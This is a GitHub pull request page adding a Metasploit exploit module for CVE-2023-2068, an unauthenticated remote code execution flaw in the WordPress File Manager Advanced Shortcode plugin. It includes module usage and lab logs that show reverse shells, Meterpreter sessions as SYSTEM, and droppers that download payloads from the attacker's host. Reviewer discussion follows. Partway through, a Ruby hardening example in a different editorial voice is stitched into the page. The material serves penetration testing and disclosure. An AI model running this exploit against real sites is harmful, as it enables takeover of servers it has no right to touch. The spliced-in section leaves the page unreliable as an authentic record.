
WordPress File Manager Advanced Shortcode Unauthenticated RCE [CVE-2023-2068] #18142

Merged (6 commits), Jul 25, 2023

Conversation

h00die-gr3y (Contributor) commented Jun 27, 2023

WordPress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode.

The WordPress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
This leads to RCE in cases where the allowed MIME type list does not include PHP files.
In the worst case, this is available to unauthenticated users, but it also works in an authenticated configuration.

File Manager Advanced Shortcode plugin version 2.3.2 and lower are vulnerable.
To install the Shortcode plugin, File Manager Advanced version 5.0.5 or lower is required to keep the configuration vulnerable. Any user can exploit this vulnerability which results in access to the underlying operating system
with the same privileges under which the WordPress web services run.

This module has been tested on:

  • Windows Server 2019 Standard and Kali Linux running on Raspberry PI.
  • WordPress 6.2.2
  • File Manager Advanced 5.0.5
  • File Manager Advanced Shortcode 2.3.2

Instructions for a vulnerable WordPress installation:
For Windows and Linux follow these instructions to install and configure WordPress: Install WordPress locally

After you have successfully installed and configured WordPress, follow the steps below to install the vulnerable plugins and configure a web page with the file-manager-advanced shortcode embedded.

  1. Download the WordPress plugins:
  2. Login as admin in WordPress
  3. On the left side menu, go to Plugins
  4. Click Add New on the submenu
  5. Page with installed Plugins appears. Click on the top on the button Add New
  6. Page with list of Plugins appears. Click on the top on the button Upload Plugin
  7. Page with browse button appears. Browse for the file-manager-advanced.zip file that you have downloaded in step 1.
  8. Click the install button
  9. Repeat the same process for file-manager-advanced-shortcode-2.3.2-mdnhux.zip
  10. When both plugins are installed successfully, configure a webpage with the file-manager-advanced shortcode embedded. Example shortcode:

    [file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations=block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]

  11. Set the TARGETURI option with the uripath pointing to this webpage
  12. Run the module and enjoy a reverse shell or meterpreter

Verification

  • Start msfconsole
  • use exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
  • set rhosts <ip-target>
  • set rport <port>
  • set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>
  • exploit
  • you should get a reverse shell or Meterpreter session depending on the payload and target settings
msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > info

       Name: Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode
     Module: exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
   Platform: Windows, Unix, Linux, PHP
       Arch: cmd, php, x64, x86, aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-05-31

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Mateus Machado Tesser

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper
      3   Windows Command
      4   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting                Required  Description
  ----       ---------------                --------  -----------
  Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.10                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80                             yes       The target port (TCP)
  SSL        false                          no        Negotiate SSL/TLS for outgoing connections
  SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /wordpress/index.php/fma-auth  yes       File Manager Advanced (FMA) Shortcode URI path
  URIPATH                                   no        The URI to use for this exploit (default is random)
  VHOST                                     no        HTTP server virtual host
  WEBSHELL                                  no        The name of the webshell with extension php. Webshell name will be randomly generated if left unset.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
                                       addresses.
  SRVPORT  1981             yes       The local port to listen on.

Payload information:

Description:
  The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
  This leads to RCE in cases where the allowed MIME type list does not include PHP files.
  In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
  File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
  To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
  vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
  with the same privileges under which the Wordpress web services run.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-2068
  https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068
  https://packetstormsecurity.com/files/172707
  https://wpscan.com/vulnerability/58f72953-56d2-4d86-a49b-311b5fc58056


View the full module info with the info -d command.

Scenarios

Windows Server 2019 PHP - php/meterpreter/reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.55
[+] Deleted KBWxIdRChosZC.php
[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.55:50380) at 2023-06-28 14:13:07 +0000

meterpreter > sysinfo
Computer    : WIN-BJDNH44EEDB
OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username: SYSTEM
meterpreter >

Kali Linux Server Unix Command - cmd/unix/reverse_bash

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted LlCresesS.php
[*] Command shell session 5 opened (192.168.201.10:4444 -> 192.168.201.10:56290) at 2023-06-28 15:34:20 +0000

uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Kali Linux Server Linux Dropper - linux/aarch64/meterpreter_reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.10:1981/manX3C
[*] Client 192.168.201.10 (Wget/1.21.3) requested /manX3C
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[+] Deleted nypafHKuf.php
[*] Meterpreter session 6 opened (192.168.201.10:4444 -> 192.168.201.10:38108) at 2023-06-28 15:36:11 +0000
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Windows Server 2019 Windows Command - cmd/windows/powershell/x64/meterpreter/reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted HAJSKquhaDT.php
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.55:50464) at 2023-06-28 14:21:39 +0000

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Windows Server 2019 Windows Dropper - windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/yRZ6hM
[*] Client 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /yRZ6hM
[*] Sending payload to 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted hjAQqbEFAt.php
[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.55:50519) at 2023-06-28 14:26:02 +0000
[*] Command Stager progress - 100.00% done (146/146 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
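The root cause described in this PR is an allow-list that is consulted against the type the client claims rather than the type the bytes actually have, so `upload_allow="image/png"` still lets a PHP file reach `wp-content`. The following is an added example, not code from the plugin or from the Metasploit module: it parses the `upload_allow` attribute out of a shortcode string and contrasts a check that trusts the declared Content-Type with one that derives the type from the file's own bytes and refuses executable extensions. The magic-byte table, the extension list and the sample uploads are constructed assumptions.

```ruby
# Added example (not the plugin's or the module's code): models the MIME
# allow-list exposed by the file_manager_advanced shortcode's upload_allow
# attribute and shows why a client-declared type is not enough.

# Magic-byte signatures for the image types we care about (constructed, not exhaustive).
MAGIC = {
  'image/png'  => "\x89PNG\r\n\x1A\n".b,
  'image/jpeg' => "\xFF\xD8\xFF".b,
  'image/gif'  => 'GIF8'.b
}.freeze

# Extensions a typical web server hands to the PHP interpreter; refused outright,
# whatever the allow-list says (constructed list, assumption).
EXEC_EXTENSIONS = %w[php php3 php4 php5 php7 phtml phar].freeze

# Pull the comma-separated upload_allow list out of a shortcode string.
def parse_upload_allow(shortcode)
  m = shortcode.match(/upload_allow="([^"]*)"/)
  m ? m[1].split(',').map(&:strip) : []
end

# Weak check: trusts whatever Content-Type the client declared for the upload.
# A PHP file declared as image/png passes this check.
def weak_upload_allowed?(allow, declared_type)
  allow.include?(declared_type)
end

# Hardened check: the file must have exactly one, non-executable extension, the
# type is sniffed from its leading bytes, and only that sniffed type is matched
# against the allow-list.
def hardened_upload_allowed?(allow, filename, data)
  exts = File.basename(filename).split('.').drop(1).map(&:downcase)
  return false if exts.size != 1                     # no extension or double extension
  return false if EXEC_EXTENSIONS.include?(exts[0])  # never store server-executable names
  sniffed = MAGIC.find { |_, sig| data.b.start_with?(sig) }&.first
  !sniffed.nil? && allow.include?(sniffed)
end
```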

github-actions commented:

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

h00die (Contributor) commented Jun 27, 2023

does the normal check_plugin_version_from_readme not work for this one, or did you prefer another method because it was more in depth?

May also want a:

    unless wordpress_and_online?
      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
    end

h00die-gr3y (Contributor, Author) commented:

> does the normal check_plugin_version_from_readme not work for this one, or did you prefer another method because it was more in depth?
>
> May also want a:
>
>     unless wordpress_and_online?
>       return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
>     end

Cool! Did not know that these already existed. I will add it to the check to make it more robust.

h00die-gr3y (Contributor, Author) commented:

@h00die,
I have reviewed the check_plugin_version_from_readme logic, but in all examples you need to login as admin first.
Is that the case? Because this will not work in my exploit. Therefore I have created another check that will identify if the File Manager Advanced Shortcode plugin is installed and applied. See this Article to understand the logic behind this check.

h00die (Contributor) commented Jun 28, 2023

you shouldn't need to login at all to use check_plugin_version_from_readme, unless this specific plugin is different. https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework%20check_plugin_version&type=code

I only looked at the first 10 or so, but many modules just call that as the singular thing for the check function

h00die-gr3y (Contributor, Author) commented:

Hi @h00die, figured out why it did not work. This particular plugin does not have a README ;-)

    execute_command(payload.encoded)
    when :linux_dropper, :windows_dropper
    execute_cmdstager({ linemax: target.opts['Space'] })
    when :windows_powershell

Contributor commented on these lines:

You should be able to remove this because of the ability to remove the powershell target.

Contributor Author replied:

See 3425173.

@adfoster-r7 adfoster-r7 self-assigned this Jul 10, 2023
cgranleese-r7 (Contributor) commented:

I didn't realise that this had conflicting files. So can't land just yet, but once that's sorted I'll be good to land 👍

I have tested this and everything is working as expected.


adfoster-r7 (Contributor) commented:

@h00die-gr3y Looks like the merge conflicts are stopping us from landing this. If you're able to rebase it we'll be able to land it; Or if you want I believe we can rebase it on our side 👍

h00die-gr3y (Contributor, Author) commented:

@adfoster-r7 I would appreciate if you can rebase it from your side.
I have tried to solve the conflict, but somehow I am not successful.
@h00die added his woocommerce-payments plugin entry in the file to support his exploit and I tried to fix by adding my plugin name again and pushed a commit. For whatever reason it still complains about a conflict.

adfoster-r7 (Contributor) commented:

Rebased on our side, thanks! 👍

I used git rebase upstream-master -i to replay your commits one at a time on top of the latest master code; then I fixed the merge conflict in your initial commits

> I tried to fix by adding my plugin name again and pushed a commit

It turns out that adding an extra commit to the end won't resolve the merge conflict that was actually in your second commit


Thanks for the PR! Will get this landed now 🎉

@cgranleese-r7 cgranleese-r7 merged commit a244c6f into rapid7:master Jul 25, 2023
34 checks passed
cgranleese-r7 (Contributor) commented Jul 25, 2023

Release Notes

This PR adds a Wordpress exploit that makes use of the WordPress File Manager Advanced Shortcode 2.3.2 plugin, to gain unauthenticated Remote Code Execution through shortcode.

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 28, 2023